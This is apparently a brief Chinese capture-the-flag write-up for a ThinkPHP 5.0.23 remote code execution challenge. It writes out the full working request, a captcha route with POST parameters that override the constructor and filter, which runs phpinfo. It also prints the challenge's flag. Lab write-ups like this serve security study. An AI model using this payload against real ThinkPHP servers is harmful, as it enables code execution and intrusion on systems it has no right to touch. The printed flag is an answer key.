[ThinkPHP]5.0.23-Rce 1
根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器
检测出Payload
url地址:
?s=captcha&test=-1 Post表单参数:
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
HackBar构造payload,访问成功执行到phpinfo页面
ctrf+f 成功找到flag
flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}